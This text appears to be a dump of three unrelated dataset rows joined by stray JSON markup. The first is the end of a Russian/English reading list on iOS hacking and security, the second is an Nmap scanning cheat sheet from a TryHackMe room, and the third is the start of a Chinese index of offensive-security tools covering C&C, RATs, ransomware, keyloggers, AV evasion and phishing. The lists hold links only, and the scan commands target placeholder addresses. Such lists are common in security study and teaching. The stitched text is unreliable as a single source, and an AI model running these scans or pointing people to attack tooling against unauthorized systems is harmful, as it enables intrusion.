Updates](https://www.youtube.com/watch?v=p512McKXukU)\n* [Building Secure iOS Apps (you don’t have to learn it the hard way!)](https://www.youtube.com/watch?v=b6LI6j_aJ9k)\n* [The Worst Mobile Apps](https://www.youtube.com/watch?v=9JuBUpRPLRs)\n* [Learn modding Unity apps and games with Frida](https://www.youtube.com/watch?v=KeWcZ-Dd6tA)\n\n## Подкасты\n* [Мобильный SSDLC](https://youtu.be/EGB8mstJlyA)\n\n\n## Статьи\n### Ru\n* [Ваш фонарик может отправлять SMS](https://habr.com/ru/company/pt/blog/155937/)\n* [Процесс загрузки iPhone. Часть 1: Boot ROM](https://habr.com/ru/post/556582/)\n* [Гайд по реверсу iOS приложения на примере ExpressVPN](https://habr.com/ru/post/569034/)\n* [Взлом и внедрение своего кода в чужое iOS-приложение](https://habr.com/ru/company/jugru/blog/570220/)\n* [Безопасность iOS-приложений: гайд для новичков](https://habr.com/ru/company/wrike/blog/544754/)\n* [Just for fun: Сколько «живет» iOS до Jailbreak](https://habr.com/ru/company/swordfish_security/blog/525772/)\n\n### En\n#### Frida\n* [iOS Swift Anti-Jailbreak Bypass with Frida](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)\n* [Gotta Catch 'Em All: Frida & jailbreak detection](https://www.romainthomas.fr/post/21-07-pokemongo-anti-frida-jailbreak-bypass/)\n* [Beginning Frida: Learning Frida use on Linux and (just a bit on) Wintel and Android systems with Python and JavaScript (Frida. hooking, and other tools)](https://www.amazon.com/Beginning-Frida-Learning-Android-JavaScript/dp/B094ZQ1HHC)\n* [Learn how to use Frida with Unity app](https://github.com/kylesmile1103/Learn-Frida)\n\n#### Прочее\n* [iOS Write ups](https://github.com/writeups/iOS)\n* [iOS Internals & Security Testing](https://rentry.co/newvw)\n* [Hacking iOS Simulator with simctl and dynamic libraries](https://curvedlayer.com/2020/08/09/ios-simulator-plugin-simctl.html)\n* [Psychic Paper](https://siguza.github.io/psychicpaper/)\n* [Stealing your SMS messages with iOS 0day](https://wojciechregula.blog/post/stealing-your-sms-messages-with-ios-0day/)\n* [Zero-day in Sign in with Apple](https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/)\n* [Return of the ios sandbox escape: lightspeeds back in the race](https://www.synacktiv.com/en/publications/return-of-the-ios-sandbox-escape-lightspeeds-back-in-the-race.html) \n* [PIN Selection on Smartphones](https://this-pin-can-be-easily-guessed.github.io/)\n* [A survey of recent iOS kernel exploits](https://googleprojectzero.blogspot.com/2020/06/a-survey-of-recent-ios-kernel-exploits.html)\n* [Apple Two-Factor Authentication: SMS vs. Trusted Devices](https://blog.elcomsoft.com/2020/06/apple-two-factor-authentication-sms-vs-trusted-devices/)\n* [Intercepting Flutter traffic on iOS](https://blog.nviso.eu/2020/06/12/intercepting-flutter-traffic-on-ios/)\n* [Snapchat detection on iOS](https://aeonlucid.com/Snapchat-detection-on-iOS/)\n* [Writing an iOS Kernel Exploit from Scratch](https://secfault-security.com/blog/chain3.html)\n* [The Four Ways to Deal with iPhone Backup Passwords](https://blog.elcomsoft.com/2020/07/4-ways-to-handle-iphone-backup-passwords/)\n* [Extracting and Decrypting iOS Keychain: Physical, Logical and Cloud Options Explored](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n* [iOS Kernel Explotation - One Byte to rule them all](https://googleprojectzero.blogspot.com/2020/07/one-byte-to-rule-them-all.html)\n* [Modern iOS Application Security](https://www.infoq.com/presentations/ios-security/)\n* [Reverse Engineering iOS Mobile Apps](https://www.bugcrowd.com/resources/webinars/reverse-engineering-ios-mobile-apps/)\n* [KTRW: The journey to build a debuggable iPhone](https://media.ccc.de/v/36c3-10806-ktrw_the_journey_to_build_a_debuggable_iphone)\n* [The One Weird Trick SecureROM Hates](https://media.ccc.de/v/36c3-11238-the_one_weird_trick_securerom_hates)\n* [Tales of old: untethering iOS 11-Spoiler: Apple is bad at patching](https://media.ccc.de/v/36c3-11034-tales_of_old_untethering_ios_11)\n* [Messenger Hacking: Remotely Compromising an iPhone through iMessage](https://media.ccc.de/v/36c3-10497-messenger_hacking_remotely_compromising_an_iphone_through_imessage)\n* [Reverse Engineering the iOS Simulator’s SpringBoard](https://vimeo.com/231806976)\n* [Most usable tools for iOS penetration testing](https://github.com/ansjdnakjdnajkd/iOS)\n* [iOS-Security-Guides](https://github.com/0xmachos/iOS-Security-Guides) \n* [Trust in Apple's Secret Garden: Exploring & Reversing Apple's Continuity Protocol-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Yen-Trust-In-Apples-Secret-Garden-Exploring-Reversing-Apples-Continuity-Protocol-3.pdf)\n* [Apple Platform Security](https://manuals.info.apple.com/MANUALS/1000/MA1902/en_US/apple-platform-security-guide.pdf)\n* [Mobile security, forensics & malware analysis with Santoku Linux](https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/viaForensics-AppSecUSA-Nov-2013.pdf)\n* [Stealing local files using Safari Web Share API](https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html?m=1)\n* [CVE-2020-9964 - An iOS infoleak](https://muirey03.blogspot.com/2020/09/cve-2020-9964-ios-infoleak.html?m=1)\n* [Attack Secure Boot of SEP](https://raw.githubusercontent.com/windknown/presentations/master/Attack_Secure_Boot_of_SEP.pdf)\n* [iOS 14 Forensics: What Has Changed Since iOS 13.7](https://blog.elcomsoft.com/2020/09/ios-14-forensics-what-has-changed-since-ios-13-7/)\n* [We Hacked Apple for 3 Months: Here’s What We Found](https://samcurry.net/hacking-apple/)\n* [Fun with XPC](https://medium.com/@ali.pourhadi/fun-with-xpc-153fd772d409)\n* [Bypass Facebook SSL Certificate Pinning for iOS](https://www.cyclon3.com/bypass-facebook-ssl-certificate-pinning-for-ios)\n* [Bypass Instagram SSL Certificate Pinning for iOS](https://www.cyclon3.com/bypass-instagram-ssl-certificate-pinning-for-ios)\n* [ASLR & the iOS Kernel — How virtual address spaces are randomised](https://bellis1000.medium.com/aslr-the-ios-kernel-how-virtual-address-spaces-are-randomised-d76d14dc7ebb)\n* [iOS/macOS penetration testing cheatsheet](https://github.com/ansjdnakjdnajkd/iOS)\n* [M1ssing Register Access Controls Leak EL0 State](https://m1racles.com/)\n* [Jailbroken iOS can't run macOS apps. I spent a week to find out why.](https://worthdoingbadly.com/macappsios/)\n* [Quick Analysis for the SSID Format String Bug](https://blog.chichou.me/2021/06/20/quick-analysis-wifid/)\n* [Unpatched iPhone Bug Allows Remote Device Takeover](https://threatpost.com/unpatched-iphone-bug-remote-takeover/167922/)\n* Reverse Engineering Starling Bank\n\t* [Part I: Obfuscation Techniques](https://hot3eed.github.io/2020/07/30/starling_p1_obfuscations.html)\n\t* [Part II: Jailbreak & Debugger Detection, Weaknesses & Mitigations](https://hot3eed.github.io/2020/08/02/starling_p2_detections_mitigations.html)\n* [ProtonMail : forensic decryption of iOS App](https://xperylab.medium.com/protonmail-forensic-decryption-of-ios-app-8e9ae9f50953)\n* [iOS on QEMU](https://github.com/alephsecurity/xnu-qemu-arm64)\n* [Proxying is not the only way to monitor network traffic on your iOS mobile apps](https://twitter.com/ddouhine/status/1430881952559685633?s=28)\n* [Forensic guide to iMessage, WhatsApp, Telegram, Signal and Skype data acquisition](https://blog.elcomsoft.com/2020/04/forensic-guide-to-imessage-whatsapp-telegram-signal-and-skype-data-acquisition/)\n* [Malware uses Corporate MDM as attack vector](https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/)\n* [Mobexler Checklist](https://mobexler.com/checklist.htm)\n* [Ad Fraud Spotted in Barcode Reader Malware Analysis](https://www.trendmicro.com/en_us/research/20/f/barcode-reader-apps-on-google-play-found-using-new-ad-fraud-technique.html)\n* [Researching Confide Messenger Encryption](https://blog.elcomsoft.com/2020/06/researching-confide-messenger-encryption/)\n* [Reverse Engineering Snapchat (Part I): Obfuscation Techniques](https://hot3eed.github.io/snap_part1_obfuscations.html)\n* [Reverse Engineering Snapchat (Part II): Deobfuscating the Undeobfuscatable](https://hot3eed.github.io/2020/06/22/snap_p2_deobfuscation.html)\n* [Firebase Cloud Messaging Service Takeover](https://abss.me/posts/fcm-takeover/)\n* [Saying Goodbye to my Favorite 5 Minute P1](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)\n* [Reverse engineering Flutter apps (Part 1)](https://blog.tst.sh/reverse-engineering-flutter-apps-part-1/)\n* [How I Hacked facebook Again!](https://hitcon.org/2020/slides/How%20I%20Hacked%20Facebook%20Again!.pdf)\n* [Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS](https://research.checkpoint.com/2020/instagram_rce-code-execution-vulnerability-in-instagram-app-for-android-and-ios/)\n* [How to use Ghidra to Reverse Engineer Mobile Application](https://infosecwriteups.com/how-to-use-ghidra-to-reverse-engineer-mobile-application-c2c89dc5b9aa)\n* [React Native Application Static Analysis](https://suam.wtf/posts/react-native-application-static-analysis-en/)\n* [Pentesting Non-Proxy Aware Mobile Applications Without Root/Jailbreak](https://medium.com/@meshal_/pentesting-non-proxy-aware-mobile-applications-65161f62a965)\n* [CVE-2021-30737 - Vulnerability Overview](http://phrack.org/issues/70/12.html#article)\n\t* [CVE-2021-30737, @xerub's 2021 iOS ASN.1 Vulnerability](https://googleprojectzero.blogspot.com/2022/04/cve-2021-30737-xerubs-2021-ios-asn1.html) \n* [Facebook BugBounty Writeups](https://github.com/jaiswalakshansh/Facebook-BugBounty-Writeups)\n\n## Остальные материалы\n* [OWASP MSTG](https://github.com/OWASP/owasp-mstg/)\n* [Full Mobile Hacking Course](https://mega.nz/folder/spoGDToC#zjYFlRAU7S06u5jSaQnvYw)\n* [NowSecure Academy](https://academy.nowsecure.com/)\n"}}},{"rowIdx":678,"cells":{"text":{"kind":"string","value":"# Nmap commands used so far\r\n\r\n[Tryhackme Room](https://tryhackme.com/room/furthernmap)\r\n[Cheat Sheet](https://www.stationx.net/nmap-cheat-sheet/)\r\n\r\n## Basics to know\r\n\r\n- Total 65535 ports are available in a computer\r\n- 1024 ports are common ones\r\n- If a syn request from nmap is dropped by firewall, nmap considers the port to be filtered\r\n\r\n## Options\r\n\r\n- `-A` For Aggressive mode, So noisy\r\n- `-F` For faster scan\r\n- `-T<1-5>` For specifying how faster the scan should be performed, the higher the number the speedier the scan\r\n- `-p` For specifying the port number to scan\r\n- `-p-` For scanning all the ports\r\n - `-p-100` For scanning till port 100\r\n- `-sn` For performing ping scan, testing the host is up or not\r\n- `-sS` For syn/Synchoronus scan\r\n- `-sU` For UDP only scan\r\n- `-sV` For guessing the version number of the service\r\n- `-sC` Will also check the default nmap scripts on the target\r\n- `-O` For os detection\r\n- `-oN ` For storing the output in normal formatting scheme\r\n- `-oA ` For storing the output in all the major formats\r\n- `--script=` For performing scan with specified script\r\n- `--top-ports ` Will scan for top `` pots only\r\n\r\n## Raw commands\r\n\r\n- `nmap -A 123.123.123.123 -T4` enable OS and version detection, script scanning, and traceroute\r\n - -T4 for faster execution; and then the hostname. -A is for aggressive scanning\r\n- `nmap -p 80 123.123.123.123` scan specified port.\r\n- `nmap -sn 0.0.0.0` Ping scan, see if the host is up or not.\r\n- `nmap -sU 0.0.0.0` UDP scan\r\n- `nmap -sS 0.0.0.0` For Syn/Synchronus scan\r\n- `nmap -F 0.0.0.0` Fast scan\r\n- `nmap 0.0.0.0. --script=default` or `nmap 0.0.0.0 -sC` Scan with default scripts\r\n- `nmap 0.0.0.0 -oA` will output the text in three major formats-> text, script_kiddie, xml\r\n- `nmap 0.0.0.0 -oN nmapOut.txt` output result in normal mode\r\n- `nmap 0.0.0.0 -O` Enables os detection\r\n- `nmap 0.0.0.0 -sV` tries to guess the version number of the service on the open port\r\n-\r\n\r\n## Basic commands to copy-paste\r\n\r\n- `nmap -sC -sV -v -oN nmap.txt $(cat ip)`\r\n- `nmap -T5 -p- -vv -sV -oN nmap.txt $(cat ip)` Just for checking whether the port is open or not.\r\n - `-T5` for speed\r\n - `-p-` For scanning all the ports\r\n - `sV` For detecting service version\r\n- `nmap -T5 -p- -vv -sV -Pn -oN nmap.txt $(cat ip)` Just for checking whether the port is open or not.\r\n - `-Pn` for bypassing icmp block\r\n- `nmap -T5 -p21,22,80 -A -sC $(cat ip)` For specific aggressive scan\r\n - `-A` for aggressive\r\n - `-sC` for running default scripts on the target\r\n\r\n## Nmap scripts\r\n\r\n[Doc](https://nmap.org/book/man-nse.html)\r\n\r\n- `nmap --script=smb*` will use all scripts starting with the keyword `smb`\r\n"}}},{"rowIdx":679,"cells":{"text":{"kind":"string","value":"# 所有收集类项目:\n- [收集的所有开源工具](https://github.com/alphaSeclab/sec-tool-list): 超过18K, 包括Markdown和Json两种格式\n- [逆向资源](https://github.com/alphaSeclab/awesome-reverse-engineering): IDA/Ghidra/x64dbg/OllDbg/WinDBG/CuckooSandbox/Radare2/BinaryNinja/DynamoRIO/IntelPin/Frida/QEMU/Android安全/iOS安全/Window安全/Linux安全/macOS安全/游戏Hacking/Bootkit/Rootkit/Angr/Shellcode/进程注入/代码注入/DLL注入/WSL/Sysmon/...\n- [网络相关的安全资源](https://github.com/alphaSeclab/awesome-network-stuff): 代理/GFW/反向代理/隧道/VPN/Tor/I2P,以及中间人/PortKnocking/嗅探/网络分析/网络诊断等\n- [攻击性网络安全资源](https://github.com/alphaSeclab/awesome-cyber-security): 漏洞/渗透/物联网安全/数据渗透/Metasploit/BurpSuite/KaliLinux/C&C/OWASP/免杀/CobaltStrike/侦查/OSINT/社工/密码/凭证/威胁狩猎/Payload/WifiHacking/无线攻击/后渗透/提权/UAC绕过/...\n\n\n# PenetrationTesting\n\n\n[English Version](https://github.com/alphaSeclab/awesome-cyber-security/blob/master/Readme_en.md)\n\nGithub的Readme显示不会超过4000行,而此Repo添加的工具和文章近万行,默认显示不全。当前页面是减配版:工具星数少于200且500天内没更新的不在此文档中显示。\n\n点击这里查看完整版:[中文-完整版](https://github.com/alphaSeclab/awesome-cyber-security/blob/master/Readme_full.md)\n\n\n# 目录\n- [新添加的](#94ca60d12e210fdd7fd9e387339b293e)\n - [工具](#9eee96404f868f372a6cbc6769ccb7f8)\n - [(1103) 新添加的](#31185b925d5152c7469b963809ceb22d)\n - [未分类](#f34b4da04f2a77a185729b5af752efc5)\n - [新添加1](#b9dc08e7e118fc7af41df5e0ef9ddc3c)\n - [新添加2](#efb2cfb167e34b03243547cfb3a662ac)\n - [未分类3](#f04dd1be8e552b074dde7cb33ae6c84c)\n - [未分类4](#cbb37de8d70e314ce905d78c566ef384)\n - [未分类5](#bb7173c3a2ea52d046c8abe3c57e3291)\n - [(1) 其他](#f7654997cf8b691617b89c5e523a942f)\n - [(3) 古老的&&有新的替代版本的](#d5e869a870d6e2c14911de2bc527a6ef)\n - [文章](#8603294b7c1f136b866b6402d63a9978)\n - [新添加的](#f110da0bf67359d3abc62b27d717e55e)\n- [收集&&集合](#a4ee2f4d4a944b54b2246c72c037cd2e)\n - [(222) 未分类](#e97d183e67fa3f530e7d0e7e8c33ee62)\n - [(9) 混合型收集](#664ff1dbdafefd7d856c88112948a65b)\n - [(12) 无工具类收集](#67acc04b20c99f87ee625b073330d8c2)\n - [(1) 收集类的收集](#24707dd322098f73c7e450d6b1eddf12)\n - [(7) 教育资源&&课程&&教程&&书籍](#9101434a896f20263d09c25ace65f398)\n - [笔记&&Tips&&Tricks](#8088e46fc533286d88b945f1d472bf57)\n - [(12) 未分类](#f57ccaab4279b60c17a03f90d96b815c)\n - [(1) blog](#0476f6b97e87176da0a0d7328f8747e7)\n - [Talk&&Conference ](#df8ec4a66ef5027bbcc591c94f8de1e5)\n - [(1) 文档&&Documentation&&规则说明&&RFC](#4be58a3a00f83975b0321425db3b9b68)\n- [特定目标](#7e840ca27f1ff222fd25bc61a79b07ba)\n - [(4) 未分类-XxTarget](#eb2d1ffb231cee014ed24d59ca987da2)\n - [(113) AWS](#c71ad1932bbf9c908af83917fe1fd5da)\n - [(1) Phoenix](#88716f4591b1df2149c2b7778d15d04e)\n - [(4) Kubernetes](#4fd96686a470ff4e9e974f1503d735a2)\n - [(1) Azure](#786201db0bcc40fdf486cee406fdad31)\n - [(1) Nginx](#40dbffa18ec695a618eef96d6fd09176)\n - [(1) ELK](#6b90a3993f9846922396ec85713dc760)\n - [(1) GoogleCloud&&谷歌云](#6730dabeca61fcf64d4f7631abae6734)\n- [物联网(IoT)&&嵌入式设备&&路由器&&交换机&&智能设备&&打印机](#d55d9dfd081aa2a02e636b97ca1bad0b)\n - [工具](#9a20a70f58ea7946f24224c5d73fac15)\n - [(46) 未分类-IoT](#cda63179d132f43441f8844c5df10024)\n - [(1) 打印机 ](#72bffacc109d51ea286797a7d5079392)\n - [(4) 路由器&&交换机](#c9fd442ecac4e22d142731165b06b3fe)\n - [(1) 嵌入式设备](#3d345feb9fee1c101aea3838da8cbaca)\n - [文章](#01e638f09e44280ae9a1a95fc376edc5)\n - [新添加](#a4a3bcead86d9f9f7977479dfe94797d)\n- [渗透&&offensive&&渗透框架&&后渗透框架](#1233584261c0cd5224b6e90a98cc9a94)\n - [工具](#5dd93fbc2f2ebc8d98672b2d95782af3)\n - [(310) 未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e)\n - [(13) 渗透多合一&&渗透框架](#2051fd9e171f2698d8e7486e3dd35d87)\n - [(4) 自动化](#fc8737aef0f59c3952d11749fe582dac)\n - [(4) 收集](#9081db81f6f4b78d5c263723a3f7bd6d)\n - [Burp](#39e9a0fe929fffe5721f7d7bb2dae547)\n - [(2) 收集](#6366edc293f25b57bf688570b11d6584)\n - [(425) 未分类-Burp](#5b761419863bc686be12c76451f49532)\n - [(4) 数据渗透&&DataExfiltration](#3ae4408f4ab03f99bab9ef9ee69642a8)\n - [Metasploit](#8e7a6a74ff322cbf2bad59092598de77)\n - [(178) 未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d)\n - [横向渗透](#adfa06d452147ebacd35981ce56f916b)\n - [(36) 免杀&&躲避AV检测](#b1161d6c4cb520d0cd574347cd18342e)\n - [(107) C&C](#98a851c8e6744850efcb27b8e93dff73)\n - [(96) DDOS](#a0897294e74a0863ea8b83d11994fad6)\n - [(148) Kali](#7667f6a0381b6cded2014a0d279b5722)\n - [(163) OWASP](#8e1069b2bce90b87eea762ee3d0935d8)\n - [(76) CobaltStrike](#0b8e79b79094082d0906153445d6ef9a)\n - [CMS](#fb821e664950df22549557cb8cc54afe)\n - [日志](#53f3011d262d2554156afe18d7ad6a43)\n - [劫持&&各种劫持](#b0233cd346f5ee456ee04bf653b12ae2)\n - [(51) 未分类-Hijack](#b087f1741bcf7c449d2910d052a7f312)\n - [点击劫持](#ecdeb90ce9bd347ca7f9d366d157689d)\n - [(31) RedTeam](#8afafc25f4fb0805556003864cce90e2)\n - [(15) BlueTeam](#4c42a9cc007de389f975cb0ce146c0ed)\n - [文章](#f21aa1088a437dbb001a137f6f885530)\n - [新添加的](#7229723a22769af40b96ab31fb09dcc7)\n - [Metasploit](#6280e13d236b0f18c75894d304309416)\n - [BurpSuite](#082a9e72817adcf2f824767e3e2ce597)\n - [CobaltStrike ](#6710d6fe61cbbc36b2ba75de156eda8a)\n- [扫描器&&安全扫描&&App扫描&&漏洞扫描](#8f92ead9997a4b68d06a9acf9b01ef63)\n - [工具](#132036452bfacf61471e3ea0b7bf7a55)\n - [(291) 未分类-Scanner](#de63a029bda6a7e429af272f291bb769)\n - [(20) 隐私&&Secret&&Privacy扫描](#58d8b993ffc34f7ded7f4a0077129eb2)\n - [隐私存储](#1927ed0a77ff4f176b0b7f7abc551e4a)\n - [(1) 未分类](#1af1c4f9dba1db2a4137be9c441778b8)\n - [(26) 隐写](#362dfd9c1f530dd20f922fd4e0faf0e3)\n - [文章](#1d8298e4ee4ad3c3028a1e157f85f27b)\n - [新添加的](#7669ebab00d00c744abc35195fbaa833)\n- [侦察&&信息收集&&子域名发现与枚举&&OSINT](#a76463feb91d09b3d024fae798b92be6)\n - [工具](#170048b7d8668c50681c0ab1e92c679a)\n - [(210) 未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99)\n - [(81) 子域名枚举&&爆破](#e945721056c78a53003e01c3d2f3b8fe)\n - [(183) 信息收集&&侦查&&Recon&&InfoGather](#375a8baa06f24de1b67398c1ac74ed24)\n - [(75) 指纹&&Fingerprinting](#016bb6bd00f1e0f8451f779fe09766db)\n - [(1) 收集](#6ea9006a5325dd21d246359329a3ede2)\n - [社交网络](#dc74ad2dd53aa8c8bf3a3097ad1f12b7)\n - [(2) Twitter](#de93515e77c0ca100bbf92c83f82dc2a)\n - [(5) 其他-SocialNetwork](#6d36e9623aadaf40085ef5af89c8d698)\n - [(13) Github](#8d1ae776898748b8249132e822f6c919)\n - [(71) DNS](#a695111d8e30d645354c414cb27b7843)\n - [(68) Shodan](#18c7c1df2e6ae5e9135dfa2e4eb1d4db)\n - [(187) nmap](#94c01f488096fafc194b9a07f065594c)\n - [文章](#b0ca6c8512a268e8438d5e5247a88c2f)\n - [新添加](#5a855113503106950acff4d7dbb2403e)\n- [社工(SET)&&钓鱼&&鱼叉攻击](#546f4fe70faa2236c0fbc2d486a83391)\n - [工具](#3e622bff3199cf22fe89db026b765cd4)\n - [(11) 未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7)\n - [(2) 社工](#f30507893511f89b19934e082a54023e)\n - [(156) 钓鱼&&Phish](#290e9ae48108d21d6d8b9ea9e74d077d)\n - [鱼叉攻击](#ab3e6e6526d058e35c7091d8801ebf3a)\n - [文章](#8f6c7489870c7358c39c920c83fa2b6b)\n - [新添加的](#d7e332e9e235fd5a60687800f5ce184c)\n- [环境配置&&分析系统](#dc89c90b80529c1f62f413288bca89c4)\n - [工具](#9763d00cbe773aa10502dbe258f9c385)\n - [(10) 未分类-Env](#f5a7a43f964b2c50825f3e2fee5078c8)\n - [(5) Linux-Distro](#cf07b04dd2db1deedcf9ea18c05c83e0)\n - [(3) 环境自动配置&&自动安装](#4709b10a8bb691204c0564a3067a0004)\n - [文章](#6454949c0d580904537643b8f4cd5a6b)\n - [新添加的](#873294ea77bc292b6fc4cfb2f9b40049)\n- [密码&&凭证&&认证](#c49aef477cf3397f97f8b72185c3d100)\n - [工具](#862af330f45f21fbb0d495837fc7e879)\n - [(98) 未分类-Password](#20bf2e2fefd6de7aadbf0774f4921824)\n - [(43) 密码](#86dc226ae8a71db10e4136f4b82ccd06)\n - [(15) 认证&&Authenticate](#764122f9a7cf936cd9bce316b09df5aa)\n - [文章](#5fda419e854b390c8361d347f48607ce)\n - [新添加的](#776c034543a65be69c061d1aafce3127)\n- [辅助周边](#43b0310ac54c147a62c545a2b0f4bce2)\n - [(12) 未分类-Assist](#569887799ee0148230cc5d7bf98e96d0)\n - [(34) TLS&&SSL&&HTTPS](#86d5daccb4ed597e85a0ec9c87f3c66f)\n- [防护&&Defense](#946d766c6a0fb23b480ff59d4029ec71)\n - [工具](#0abd611fc3e9a4d9744865ca6e47a6b2)\n - [(101) WAF](#784ea32a3f4edde1cd424b58b17e7269)\n - [(119) 防火墙&&FireWall](#ce6532938f729d4c9d66a5c75d1676d3)\n - [(39) IDS&&IPS](#ff3e0b52a1477704b5f6a94ccf784b9a)\n - [(43) 未分类-Defense](#7a277f8b0e75533e0b50d93c902fb351)\n - [(3) 隐私保护&&Privacy](#6543c237786d1f334d375f4d9acdeee4)\n - [文章](#5aac7367edfef7c63fc95afd6762b773)\n - [新添加的](#04aac0e81b87788343930e9dbf01ba9c)\n- [SoftwareDefinedRadio](#52b481533d065d9e80cfd3cca9d91c7f)\n - [(6) 工具](#015984b1dae0c9aa03b3aa74ea449f3f)\n - [文章](#043e62cc373eb3e7b3910b622cf220d8)\n- [LOLBin&&LOLScript](#507f1a48f4709abb1c6b0d2689fd15e6)\n - [(2) 工具](#ec32edc7b3e441f29c70f6e9bca0174a)\n - [文章](#9bffad3ac781090ab31d4013bf858dd9)\n- [日志&&Log](#e25d233159b1dc40898ff0c74574f790)\n - [(1) 工具](#13df0f4d5c7a1386b329fd9e43d8fc15)\n - [文章](#06e7d46942d5159d19aa5c36f66f174a)\n- [威胁狩猎&&ThreatHunt](#9b026a07fdf243c6870ce91f00191214)\n - [工具](#b911aad7512e253660092942e06d00ad)\n - [(1) 未分类](#0b27f97199330c4945572a1f9c229000)\n - [文章](#f613271a55b177f626b42b8c728a0b1c)\n - [新添加的](#3828e67170e5db714c9c16f663b42a5e)\n- [Crypto&&加密&&密码学](#d6b02213a74372407371f77dd6e39c99)\n - [(13) 工具](#41d260119ad54db2739a9ae393bd87a5)\n - [文章](#cc043f672c90d4b834cdae80bfbe8851)\n- [恶意代码&&Malware&&APT](#8cb1c42a29fa3e8825a0f8fca780c481)\n - [(12) 工具](#e2fd0947924229d7de24b9902e1f54a0)\n - [文章](#cfffc63a6302bd3aa79a0305ed7afd55)\n- [REST_API&&RESTFUL ](#7d5d2d22121ed8456f0c79098f5012bb)\n - [(3) 工具](#3b127f2a89bc8d18b4ecb0d9c61f1d58)\n - [文章](#b16baff7e1b11133efecf1b5b6e10aab)\n- [蓝牙&&Bluetooth](#ceb90405292daed9bb32ac20836c219a)\n - [(3) 工具](#c72811e491c68f75ac2e7eb7afd3b01f)\n - [文章](#97e1bdced96fc7fcd502174d6eecee36)\n- [浏览器&&browser](#76df273beb09f6732b37a6420649179c)\n - [(21) 工具](#47a03071becd6df66b469df7c2c6f9b5)\n - [文章](#ca0c0694dc0aa87534e9bb19be4ee4d5)\n- [MitreATT&CK](#249c9d207ed6743e412c8c8bcd8a2927)\n - [工具](#a88c0c355b342b835fb42abee283bd71)\n - [(27) 未分类的](#6ab6835b55cf5c8462c4229a4a0ee94c)\n - [文章](#8512ba6c3855733a1474ca2f16153906)\n - [新添加的](#4b17464da487fbdf719e9a1482abf8f1)\n- [破解&&Crack&&爆破&&BruteForce](#de81f9dd79c219c876c1313cd97852ce)\n - [工具](#73c3c9225523cbb05333246f23342846)\n - [(255) 未分类的](#53084c21ff85ffad3dd9ce445684978b)\n - [文章](#171e396a8965775c27602762c6638694)\n - [新添加的](#fc3c73849911ede2ce0d6d02f1f5b0b9)\n- [泄漏&&Breach&&Leak](#96171a80e158b8752595329dd42e8bcf)\n - [工具](#602bb9759b0b2ba5555b05b7218a2d6f)\n - [(15) 未分类](#dc507c5be7c09e1e88af7a1ad91e2703)\n - [文章](#fb3bccf80281e11fdf4ef06ddaa34566)\n - [新添加的](#339727dd5a006d7a5bd8f0173dc80bb9)\n- [爬虫](#785ad72c95e857273dce41842f5e8873)\n - [工具](#0f931c85ab54698d0bcfaf9a3e6dac73)\n - [(1) 未分类](#442f9390fd56008def077a21ab65d4aa)\n - [文章](#23b008498c8b41ec3128bd9855660b7d)\n - [新添加的](#37ca6907aa42dfd32db5973ff9eec83d)\n- [无线&&WiFi&&AP&&802.11](#39931e776c23e80229368dfc6fd54770)\n - [(184) 未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c)\n - [(7) WPS&&WPA&&WPA2](#8d233e2d068cce2b36fd0cf44d10f5d8)\n - [(2) 802.11](#8863b7ba27658d687a85585e43b23245)\n- [Payload&&远控&&RAT](#80301821d0f5d8ec2dd3754ebb1b4b10)\n - [工具](#783f861b9f822127dba99acb55687cbb)\n - [(134) 未分类-payload](#6602e118e0245c83b13ff0db872c3723)\n - [(20) Payload收集](#b5d99a78ddb383c208aae474fc2cb002)\n - [(44) 远控&&RAT](#b318465d0d415e35fc0883e9894261d1)\n - [(58) Payload生成](#ad92f6b801a18934f1971e2512f5ae4f)\n - [(34) Botnet&&僵尸网络](#c45a90ab810d536a889e4e2dd45132f8)\n - [(70) 后门&&添加后门](#b6efee85bca01cde45faa45a92ece37f)\n - [(105) 混淆器&&Obfuscate](#85bb0c28850ffa2b4fd44f70816db306)\n - [(1) Payload管理](#78d0ac450a56c542e109c07a3b0225ae)\n - [(32) 勒索软件](#d08b7bd562a4bf18275c63ffe7d8fc91)\n - [(32) 键盘记录器&&Keylogger](#82f546c7277db7919986ecf47f3c9495)\n - [(13) Meterpreter](#8f99087478f596139922cd1ad9ec961b)\n - [(6) Payload投递](#63e0393e375e008af46651a3515072d8)\n - [文章](#0b644b2d8119abf6643755ef455fcf2c)\n - [新添加](#27962a7633b86d43cae2dd2d4c32f1b6)\n- [后渗透](#a9494547a9359c60f09aea89f96a2c83)\n - [工具](#3ed50213c2818f1455eff4e30372c542)\n - [(49) 未分类-post-exp](#12abc279c69d1fcf10692b9cb89bcdf7)\n - [(53) 提权&&PrivilegeEscalation](#4c2095e7e192ac56f6ae17c8fc045c51)\n - [Windows](#caab36bba7fa8bb931a9133e37d397f6)\n - [(19) UAC](#58f3044f11a31d0371daa91486d3694e)\n - [(72) 未分类-Windows](#7ed8ee71c4a733d5e5e5d239f0e8b9e0)\n - [(3) AppLocker](#b84c84a853416b37582c3b7f13eabb51)\n - [(10) ActiveDirectory](#e3c4c83dfed529ceee65040e565003c4)\n - [域渗透](#25697cca32bd8c9492b8e2c8a3a93bfe)\n - [WET](#a5c1d88a8e35b6c6223a6d64dbfb5358)\n - [(10) 驻留&&Persistence](#2dd40db455d3c6f1f53f8a9c25bbe63e)\n - [Linux&&Xnix](#4fc56d3dd1977b882ba14a9fd820f8e2)\n - [文章](#c86567da7d4004149912383575be3b45)\n - [新添加](#fdf10af493284be94033d1350f1e9b5c)\n\n\n# 新添加的\n\n\n***\n\n\n## 工具\n\n\n### 新添加的\n\n\n- [**825**星][2m] [Py] [corelan/mona](https://github.com/corelan/mona) 用于Immunity Debugger的mona.py\n- [**813**星][26d] [JS] [sindresorhus/is-online](https://github.com/sindresorhus/is-online) 检查互联网连接是否正常\n- [**810**星][2m] [Shell] 